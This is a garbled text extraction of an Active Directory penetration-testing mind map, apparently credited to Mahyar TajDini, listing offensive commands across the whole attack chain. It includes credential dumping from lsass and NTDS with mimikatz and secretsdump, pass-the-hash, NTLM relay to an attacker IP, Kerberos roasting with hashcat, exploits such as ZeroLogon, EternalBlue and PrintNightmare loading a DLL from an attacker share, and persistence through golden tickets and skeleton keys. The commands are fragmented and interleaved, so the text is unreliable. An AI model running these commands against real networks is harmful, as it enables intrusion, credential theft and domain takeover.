
Pivoting to other computers

psexec.py -hashes ":<hash>" <user>@<ip>


Bloodhound

wmiexec.py -hashes ":<hash>" <user>@<ip>


PowerView
atexec.py -hashes ":<hash>" <user>@<ip> "
command"
pass the hash

evil-winrm -i <ip>/<domain> -u <user> -H <


got administrator access on one machine
hash>

no credentials classic quick compromise methods mimikatz "privilege::debug" "sekurlsa::


Privilege escalation xfreerdp /u:<user> /d:<domain> /pth:<hash> /
procdump.exe -accepteula -ma lsass.exe lsass. minidump lsass.dmp" "sekurlsa::
java rmi exploit/multi/misc/java_rmi_server dmp logonPasswords" "exit" v:<ip>
cme smb <ip_range> # enumerate smb hosts winpeas.exe
ms17-010 exploit/windows/smb/ms17_010_eternalblue python getTGT.py <domain>/<user> -hashes :< export KRB5CCNAME=/root/impacket- python psexec.py <domain>/<user>@<ip> -k -
nmap -sP -p <ip> # ping scan mimikatz "privilege::debug" "token::elevate" "
search password files findstr /si 'password' *.txt *.xml *.docx hashes> examples/domain_ticket.ccache no-pass
sekurlsa::logonpasswords" "lsadump::sam" "
auxiliary/scanner/http/tomcat_enum exit"
nmap -PN -sV --top-ports 50 --open <ip> # Juicy Potato / Lovely Potato overpass the hash / pass the key (PTK) Rubeus ptt /ticket:<ticket>
quick scan tomcat/jboss manager exploit/multi/http/tomcat_mgr_deploy
get credentials post/windows/gather/smart_hashdump hashdump Rubeus asktgt /user:victim /rc4:<rc4value>
java serialized port ysoserial PrintSpoofer Rubeus createnetonly /program:C:\Windows\
nmap -PN --script smb-vuln* -p139,445 <ip> #
System32\[cmd.exe||upnpcont.exe] Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>
Scan Network search smb vuln
RoguePotato
cme smb <ip_range> -u <user> -p <password> -
vulnerable product with cve searchsploit Low access M lsassy
find vulnerable host privilege::debug sekurlsa::tickets /export
nmap -PN -sC -sV <ip> # classic scan
Low hanging fruit SMBGhost CVE-2020-0796 sekurlsa::tickets /export
use scanner/smb/smb_enum_gpp cme smb <ip_range> -u <user> -p '<
nmap -PN -sC -sV -p- <ip> # full scan password>' --sam / --lsa / --ntds
MS14-025 CVE-2021-36934 (HiveNightmare/ Get tickets Rubeus dump /service:krbtgt /nowrap
findstr /S /I cpassword \\<FQDN>\sysvol\<
FQDN>\policies\*.xml SeriousSAM) PPLdump64.exe <lsass.exe|lsass_pid> lsass.
nmap -sU -sC -sV <ip> # udp scan
dmp Rubeus dump /luid:0xdeadbeef /nowrap
database credentials use admin/mssql/mssql_enum_sql_logins ...
mimikatz "!+" "!processprotect /process:lsass. Get-NetComputer -Unconstrained
Unconstrained delegation
nmcli dev show eth0 # show domain name & LSA as a Protected Process exe /remove" "privilege::debug" "token::
proxylogon
dns elevate" "sekurlsa::logonpasswords" "! Get-DomainComputer -Unconstrained -
processprotect /process:lsass.exe" "!-" #with Properties DnsHostName
proxyshell
nslookup -type=SRV _ldap._tcp.dc._msdcs.// mimidriver.sys
find AD IP got username but no password
Administrator access
DOMAIN/ Get unconstrained delegation machines MATCH (c:Computer {unconstraineddelegation:
search password files findstr /si 'password' *.txt *.xml *.docx true}) RETURN c
crackmapexec <IP> -u 'user' -p 'password' --
pass-pol search stored password lazagne.exe all
dig axfr <domain_name> @<name_server> MATCH (u:User {owned:true}), (c:Computer {
Get password policy
zone transfer enum4linux -u 'username' -p 'password' -P <IP>
unconstraineddelegation:true}), p=
mklink /d c:\shadowcopy \\?\GLOBALROOT\ shortestPath((u)-[*1..]->(c)) RETURN p
shadow copies diskshadow list shadows all Device\HarddiskVolumeShadowCopy1\
cme smb <dc-ip> -u user.txt -p password.txt -- privilege::debug sekurlsa::tickets /export
Password spray
no-bruteforce # test user=password .\incognito.exe execute -c "<domain>\<user>" sekurlsa::tickets /export
enum4linux -a -u "" -p "" <dc-ip> &&
enum4linux -a -u "guest" -p "" <dc-ip> credentials found .\incognito.exe list_tokens -u powershell.exe
cme smb <dc-ip> -u user.txt -p password.txt # token manipulation got an admin access ? Get tickets Rubeus dump /service:krbtgt /nowrap
smbmap -u "" -p "" -P 445 -H <dc-ip> && multiple tests (careful of lockout policy) use incognito impersonate_token <domain>\\<user>
smbmap -u "guest" -p "" -P 445 -H <dc-ip> Rubeus dump /luid:0xdeadbeef /nowrap
python GetNPUsers.py <domain>/ -usersfile < dpapi extract
smbclient -U '%' -L //<dc-ip> && smbclient -U ' Got valid username usernames.txt> -format hashcat -outputfile < got credentials Get-DomainComputer -TrustedToAuth -
hashes.domain.txt> hash found Constrained delegation
List guest access on smb guest%' -L //<dc-ip>
Get hash
Properties DnsHostName, MSDS-
GetADUsers.py -all -dc-ip <dc_ip> <domain>/< AllowedToDelegateTo
share cme smb <ip> -u '' -p '' # enumerate null Rubeus asreproast /format:hashcat Get all users username>
session MATCH (c:Computer), (t:Computer), p=((c)-[:
ASREPRoast Get-DomainUser -PreauthNotRequired - cme smb <ip> -u <user> -p <password> -- AllowedToDelegate]->(t)) RETURN p
Properties SamAccountName Get constrained delegation machines
cme smb <ip> -u 'a' -p '' # enumerate enumerate SMB share shares
anonymous access MATCH (u:User {owned:true}), (c:Computer {
Get ASREPRoastable users MATCH (u:User {dontreqpreauth:true}), (c: bloodhound-python -d <domain> -u <user> - name: "<MYTARGET.FQDN>"}), p=shortestPath((
Computer), p=shortestPath((u)-[*1..]->(c)) bloodhound p <password> -gc <dc> -c all u)-[*1..]->(c)) RETURN p
Active Directory nmap -n -sV --script "ldap* and not brute" -p
RETURN p

no smb signing || ipv6 enabled || adcs powerview / pywerview Resource-Based Constrained Delegation
389 <dc-ip>
Penetration Manual user found
Lateral move
Enumerate ldap ldapsearch -x -h <ip> -s base use exploit/windows/smb/smb_relay # GetUserSPNs.py -request -dc-ip <dc_ip> < lsadump::dcsync /domain:htb.local /user:
MS08-068 windows200 / windows server2008 domain>/<user>:<password> krbtgt # Administrators, Domain Admins, or
hash found
Get hash Enterprise Admins as well as Domain Controller
responder -I eth0 # disable smb & http ntlmrelayx.py -tf targets.txt Rubeus kerberoast dcsync computer accounts
enum4linux -U <dc-ip> | grep 'user:'
ntlmrelayx.py -6 -wh <attacker_ip> -l /tmp - kerberoasting Get-DomainUser -SPN -Properties WSUSpendu.ps1 # need compromised WSUS
socks -debug SamAccountName, ServicePrincipalName WSUSpect server
crackmapexec smb <ip> -u <user> -p '<
password>' --users
user found sccm CMPivot
MATCH (u:User {hasspn:true}) RETURN u
Find user list ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<
Get kerberoastable users
nmap -p 88 --script=krb5-enum-users --script- relay mitm6 -i eth0 -d <domain> target> -l /tmp -socks -debug
args="krb5-enum-users.realm='<domain>', Got one account on the domain MATCH (u:User {hasspn:true}), (c:Computer), p= MSSQL Trusted Links use exploit/windows/mssql/mssql_linkcrawler
OSINT - enumerate username on internet userdb=<users_list_file>" <ip> ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ getST.py -spn cifs/<target> <domain>/< shortestPath((u)-[*1..]->(c)) RETURN p
ip> --delegate-access netbios_name>\$ -impersonate <user> rpcdump.py <domain>/<user>:<password>@< printerbug.py '<domain>/<username>:<
rpcclient $> lookupnames <name> Printers spooler service abuse domain_server> | grep MS-RPRN password>'@<Printer IP> <RESPONDERIP>
ntlmrelayx.py -t http://<dc_ip>/certsrv/ wmic useraccount get name,sid
nmap -Pn -sS -T4 --open --script smb-
certfnsh.asp -debug -smb2support --adcs -- Rubeus.exe asktgt /user:<user> /certificate:< auxiliary/admin/kerberos/ms14_068_kerberos_ GenericAll on User
security-mode -p445 ADDRESS/MASK
adcs template DomainController base64-certificate> /ptt checksum
unsigned SMB cracking hash GenericAll on Group
find smb not signed use exploit/windows/smb/smb_relay MS14-068 FindSMB2UPTime.py <ip>
goldenPac.py -dc-ip <dc_ip> <domain>/<
john --format=lm hash.txt user>:'<password>'@<target> kerberos::ptc "<ticket>" GenericAll / GenericWrite / Write on Computer
cme smb $hosts --gen-relay-list relay.txt
LM
hashcat -m 3000 -a 3 hash.txt dnscmd.exe /config /serverlevelplugindll <\\ sc \\DNSServer stop dns WriteProperty on Group
PetitPotam.py -d <domain> <listener_ip> < path\to\dll> # need a dnsadmin user sc \\DNSServer start dns
target_ip>
relay/poisoning john --format=nt hash.txt Self (Self-Membership) on Group
NTLM CVE-2021-1675.py <domain>/<user>:<
responder -i eth0 AD acl abuse aclpwn.py
password>@<target> '\\<smb_server_ip>\<
hashcat -m 1000 -a 3 hash.txt WriteProperty (Self-Membership)
user & hash found PrintNightmare share>\inject.dll'
mitm6 -d <domain>
john --format=netntlm hash.txt ForceChangePassword
dnstool.py -u 'DOMAIN\user' -p 'password' --
NTLMv1 enum dns record '*' --action query <dc_ip>
hashcat -m 5500 -a 3 hash.txt WriteOwner on Group
python3 cve-2020-1472-exploit.py <MACHINE_
BIOS_NAME> <ip> crack hash
find hash john --format=netntlmv2 hash.txt GenericWrite on User
secretsdump.py <DOMAIN>/<MACHINE_BIOS_
NAME>\$@<IP> -no-pass -just-dc-user " NTLMv2
Administrator" python3 restorepassword.py -target-ip <IP> < hashcat -m 5600 -a 0 hash.txt rockyou.txt WriteDACL + WriteOwner
secretsdump.py -hashes :<HASH_admin> < DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_
DOMAIN>/Administrator@<IP> BIOS_NAME> -hexpass <HEXPASS> john spn.txt --format=krb5tgs --wordlist= GPO Delegation
zerologon rockyou.txt Domain admin
Kerberos 5 TGS Get-LAPSPasswords -DomainController <ip_
hashcat -m 13100 -a 0 spn.txt rockyou.txt crackmapexec smb 127.0.0.1 -u <user> -p < dc> -Credential <domain>\<login> | Format-
password> -d <domain> --ntds Table -AutoSize
hashcat -m 18200 -a 0 AS-REP_roast-hashes
Kerberos ASREP rockyou.txt secretsdump.py '<domain>/<user>:<pass>'@< foreach ($objResult in $colResults){$
ip> objComputer = $objResult.Properties; $
get laps passwords
dump ntds.dit objComputer.name|where {$objcomputer.
Domain admin secretsdump.py -ntds ntds_file.dit -system name -ne $env:computername}|%{foreach-
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q SYSTEM_FILE -hashes lmhash:nthash LOCAL - object {Get-AdmPwdPassword -
q outputfile ntlm-extract ComputerName $_}}}

windows/gather/credentials/domain_hashdump python privexchange.py -ah <attacker_host_or_


ip> <exchange_host> -u <user> -d <domain> - ntlmrelayx.py -t ldap://<dc_fqdn>--escalate-
privexchange p <password> user <user>

ADCS

Mahyar@TajDini.net
Persistence mayfly (@M4yFly)

Github.com/mahyarx net group "domain admins" myuser /add /


domain Trust relationship

Mahyar TajDini Linkedin.com/in/mahyartajdini ticketer.py -nthash <nthash> -domain-sid < kerberos::golden /user:Administrator /krbtgt:<
Golden ticket domain_sid> -domain <domain> <user> Get-NetGroup -Domain <domain> - HASH_KRBTGT> /domain:<domain> /sid:<user_
Child Domain to Forest Compromise - SID GroupName "Enterprise Admins" -FullData| sid> /sids:<RootDomainSID-519> /ptt
Hijacking select objectsid mimikatz lsadump::trust
TajDini.net Silver Ticket

"kerberos::golden /user:Administrator /
PowerShell New-ItemProperty "HKLM:\System\
domain:<domain> /sid:
CurrentControlSet\Control\Lsa\" -Name
<domain_SID> /rc4:<trust_key> /service:krbtgt / .\Rubeus.exe asktgs /ticket:<kirbi file> /
"DsrmAdminLogonBehavior" -Value 2 -
Persistence "lsadump::trust /patch" target:<target_domain> /ticket: service:"Service's SPN" /ptt
DSRM PropertyType DWORD
Forest to Forest Compromise - Trust Ticket "lsadump::lsa /patch" <golden_ticket_path>"
Trust relationship
mimikatz "privilege::debug" "misc::skeleton" "
printerbug or petitpotam to force the DC of the
Skeleton Key exit"
external forest to connect on a local
unconstrained delegation machine. Capture
mimikatz "privilege::debug" "misc::memssp" " Breaking forest trust TGT, inject into memory and dcsync
Custom SSP exit" C:\Windows\System32\kiwissp.log

...
